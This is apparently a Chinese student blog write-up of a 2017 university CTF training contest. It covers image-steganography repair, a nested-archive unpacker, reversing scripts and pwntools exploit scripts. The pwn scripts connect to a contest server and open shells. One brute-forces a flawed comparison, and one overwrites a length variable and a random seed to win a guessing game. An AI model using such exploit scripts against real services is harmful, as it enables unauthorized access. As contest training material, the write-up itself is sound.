10.0.0.55_12-16训练赛部分writeup

2017-12-16训练赛

2018-1-4新生选拔赛

2017-12-16训练赛

0x1 - MISC

  MISC100

  一张帅行的照片

      10.0.0.55_12-16训练赛部分writeup

  目测是图片隐写,但是binwalk并没有出来,应该是对文件头进行了修改

  010editor查看一下,发现在jpg文件尾之后还有大量的数据

  10.0.0.55_12-16训练赛部分writeup

  而且在灰色部分发现了IHDR,是png文件的一个标志,所以应该是文件连缀之后删去了png的文件头、尾

  所以可以进行修复,在灰色部分前后分别加上png的文件头尾,并删去前面帅行的数据

  保存之后发现图片是纯白的,而且在linux下无法打开

  ->有可能是文件长宽被修改之后crc校验不匹配导致的

  详情见M4X司机http://www.cnblogs.com/WangAoBo/p/7108278.html

  提供两种方法

  ①利用crc进行宽和高的爆破,得到正确的尺寸,修改得到完整图片

  10.0.0.55_12-16训练赛部分writeup

  flag就是帅行的女朋友标准

  ②直接删去部分数据

  这个操作不是很稳,但是比写脚本爆破要快一点

  10.0.0.55_12-16训练赛部分writeup

  可以看到在图片中存在大量的单调规则的数据,不会是有价值的信息

  所以可以直接把这部分删掉,把下面被隐藏的部分暴露出来

  10.0.0.55_12-16训练赛部分writeup

  效果也还不错

  MISC200

  一个多重压缩包,tar.gz方式压缩的

  经过简单查看,每两层一个数字作为名字,先解压gz,之后是tar包

  exp:

#!/usr/bin/env python

import gzip
import os
import tarfile def un_gz(name):
g_file = gzip.GzipFile(name)
new_name = name+"tar"
open(new_name,"w+").write(g_file.read())
g_file.close()
# un_gz(new_name)
tar = tarfile.open(new_name)
name = tar.getnames()[0]
tar.extract(name)
tar.close()
un_gz(name) un_gz("800")

  get flag:10.0.0.55_12-16训练赛部分writeup

0x2 - Reverse

  Reverse100

    10.0.0.55_12-16训练赛部分writeup

  这就是关键函数了

  10.0.0.55_12-16训练赛部分writeup

  把a1的每一位和0x804A040的每一位进行比对

  比较简单的逻辑,把运算的优先级看好,按照逻辑写出反向计算脚本

  exp:

s=[0x8F,0xAA,0x85,0xA0,0x48,0xAC,0x40,0x95,0xB6,0x16,0xBE,0x40,0xB4,0x16,0x97,0xB1,0xBE,0xBC,0x16,0xB1,0xBC,0x16,0x9D,0x95,0xBC,0x41,0x16,0x36,0x42,0x95,0x95,0x16,0x40,0xB1,0xBE,0xB2,0x16,0x36,0x42,0x3D,0x3D,0x49]
a='./re100'
ls=''
for i in range(42):
t=(((s[i] & 0xAA) >> 1) | (2*(s[i]&0x55)))-9
ls += chr(t&0xffff)
print(ls)

  需要注意的是,减号的优先级还挺高的,漏掉原来的一个括号,就得不到正确的结果了

  10.0.0.55_12-16训练赛部分writeup

  Reverse200

  10.0.0.55_12-16训练赛部分writeup

  一个64位程序,check被破坏了,不能用ida使用F5,下面给出三个方法

  ①使用gdb调试

  10.0.0.55_12-16训练赛部分writeup

  在gdb中,找到strcmp函数,查看参数就能直接看到flag(M4x的图,别问我,我还没get技能,会玩了可能来补一下)

  ②修复程序,使其可以使用F5查看伪代码

  10.0.0.55_12-16训练赛部分writeup

  左箭头指向处ALT+ k,把右箭头指向处改为0即可

  10.0.0.55_12-16训练赛部分writeup

  下面应该就比较好弄了

  ③利用程序漏洞爆破

  也就我这么皮,上面删图片数据,下面用漏洞爆破了

  在题目更新之前,存在一个逻辑错误

  10.0.0.55_12-16训练赛部分writeup

  在试运行时发现输入“flag”,也能得到输入正确的反馈

  所以很容易想到如果输入预期字符串的前n的字符,那么会得到正确回馈

  所以可以根据这个特性进行逐位爆破:

    在已知flag后加入一个可打印字符,如果回馈正确,就把这个字符加入flag中

    到最后能得到完整的flag

    exp:

#!/usr/bin/env python

from pwn import *
import string # context.log_level='debug'
payload = 'flag{'
feedback = ''
sou = string.printable
# print sou
while(1):
for i in sou:
pay=payload+i
io=process("./re200")
elf = ELF("./re200")
io.sendline(pay)
feedback = io.recvline()
if(feedback[19]=='l'):
payload = pay
print pay
break
io.close()
if(pay[-1]=='}'):
break

  10.0.0.55_12-16训练赛部分writeup

  也就几十秒就出来了,看来官方解答还是用gdb嘛

0x3 - PWN

  pwn100

  没有elf的pwn

  将ip和端口在浏览器打开就是程序的输出

  10.0.0.55_12-16训练赛部分writeup

  给出了溢出跳转的函数地址,而且是64位的地址

  所以只需要我们根据输入payload之后的回馈,将该地址覆写到合适的位置,即找出填充字符串的长度

  经过尝试,填充字符串为0x38,所以得到exp

  10.0.0.55_12-16训练赛部分writeup

  10.0.0.55_12-16训练赛部分writeup

  地址是随机化的,按照小端序和返回提示,找到正确的填充长度

  10.0.0.55_12-16训练赛部分writeup

  在此目录下,可以找到hiddenlevel

  10.0.0.55_12-16训练赛部分writeup

  (命令语句都不会,能找出来才怪哩10.0.0.55_12-16训练赛部分writeup)

  pwn200

  好题!开创了py出pwn的先河!

  一个pyc文件,可以很容易反编译出准确的源码

  那么面临两个问题:找出程序中system函数的地址,确定溢出长度

  好了,上一行划掉。这不是一个溢出的漏洞,而是程序逻辑错误

  10.0.0.55_12-16训练赛部分writeup

  可以发现,在程序进行随机字符比对时,没有进行一对一的比较,而是6*6的比较方式

  这就造成,只要我们的输入和随机字符串有一个相同,就能实现match==6

  所以我们可以采用相同的key = 'aaaaaa',循环的执行程序,直到遇到含有一个‘a'的随机字符组合

  exp:

#!/usr/bin/env python

from pwn import *
import string
context.log_level = 'debug'
while(1):
feedback =''
io=remote("10.4.21.55",9002)
elf = ("./pwn200")
payload = 'a' * 6
# io.recvuntil("chioce: ")
io.recvline()
io.recvline()
io.recvline()
io.recvline()
io.recv(13)
io.sendline("1")
io.recvuntil("chars: ")
io.sendline(payload)
feedback = io.recvline()
if(feedback[0]=='H'):
io.close()
continue
else:
io.interactive()
break
print feedback

  10.0.0.55_12-16训练赛部分writeup

  很快就能跑出结果

  pwn400

  有点坑是真的。。

  10.0.0.55_12-16训练赛部分writeup

  美(sang)丽(xin)壮(bing)观(kuang)的全保护题目,而且确实限制了读取长度

  在ida中查看

  10.0.0.55_12-16训练赛部分writeup

  开了金丝雀,在目前没有get绕过canary的情况下,栈溢出控制返回地址就行不通了

  但是可以发现两点比较有价值的:

    ①username在data区,下面紧邻了len,也就是控制密码读取长度的变量

    10.0.0.55_12-16训练赛部分writeup

    ②密码(buf)的下面有seed

    10.0.0.55_12-16训练赛部分writeup

  所以我们可以有以下思路:

    先在username输入时覆盖len,使其长度足够

    输入password时,覆盖seed,使随机数种子已知

  如此控制了随机数的种子,便掌控一切

#!/usr/bin/env python

from pwn import *
import random as rd
context.log_level='debug'
v6 = [395,2255,862,1541,3798,3688,1267,935,26,3543,3926,2443,2946,1158,515,2110,998,3883,3834,4603,2920,3844,4543,3231,796,1097,2927,846,541,2832,233,2229,465,3617,3079,2223,3953,587,1907,80,3695,858,1511,269,1154,2807,3588,2290,1184,3607,1726,1184,963,167,2541,729,2175,2569,3708,298,4252,211,1338,571,1140,48,1929,1156,4375,3336,4652,4650,3656,2595,2239,1774,1361,2333,710,472,1477,1834,948,2302,1179,3410,229,938,2597,1951,563,2927,4381,1415,4199,1508,2048,4368,2999,1519]
io = remote("10.4.21.55",9003)
# io = process("./pwn300")
elf = ELF("./pwn400")
username = 'a'*12+p32(100)
password = 'a'* 9 + p32(0)
# io.recvuntil(")\n")
io.recvline()
io.recvline()
io.recvline() io.sendline(username) io.recvline()
io.sendline(password)
io.recvline()
io.recvline() for i in range(100):
io.recvline()
io.recvline()
io.recvline()
io.sendline(str(v6[i])) io.recvline()
io.recvline()
io.interactive()
io.close()

  (在尝试过程中遇到几次recvuntil不能正常recv的情况,便改成了多个recvline)

  需要注意的是,此时虽然在seed处覆盖了“p32(0)”,但是并不是“srand(0)”

  所以随机数表可通过自己编写C脚本,使用相同的值覆盖seed,得到和程序相同的随机数表

  10.0.0.55_12-16训练赛部分writeup

  10.0.0.55_12-16训练赛部分writeup

  掌控了随机数,便可以按顺序输入给程序,使得猜对100次,获得shell

  10.0.0.55_12-16训练赛部分writeup

  等get了绕金丝雀的技能再回来收拾这家伙

0x4总结扯皮

  这次的训练赛收获还是很大的,虽然有些地方是投机取巧的,但pwn做的还是很舒服(全靠M4x司机带)

  三个pwn题都比较有新意,突破了之前练习的常规思路

  第一个没有elf,还是第一次遇到,不能对程序进行分析,抱着试试的态度解锁盲pwn新姿势

  第二个突破天际,竟然是py,之前都是常规套路的溢出漏洞,找了半天怎么对pyc文件进行溢出的,经过提醒才仔细看代码的逻辑漏洞,关注点还是要全面一点吧

  第三个吊炸天的全保护。最开始注意到len和seed的位置特殊时,还真有过一丝控制随机数的想法,但总觉得太过暴力,不符合pwn的美学,想去找适合新手用的绕过金丝雀进行溢出,然而事实就是这么粗暴。。。等我get了绕canary,再回来收拾收拾这家伙,美学不容破坏

2018-1-4新生选拔赛

作者:辣鸡小谱尼


出处:http://www.cnblogs.com/ZHijack/

如有转载,荣幸之至!请随手标明出处;

上一篇:/usr/local/mysql/bin/mysqlbinlog -vv /var/lib/bin/mysql-bin.000008 --base64-output=DECODE-ROWS --start-pos=307


下一篇:export PATH=$PATH:/usr/local/mysql/bin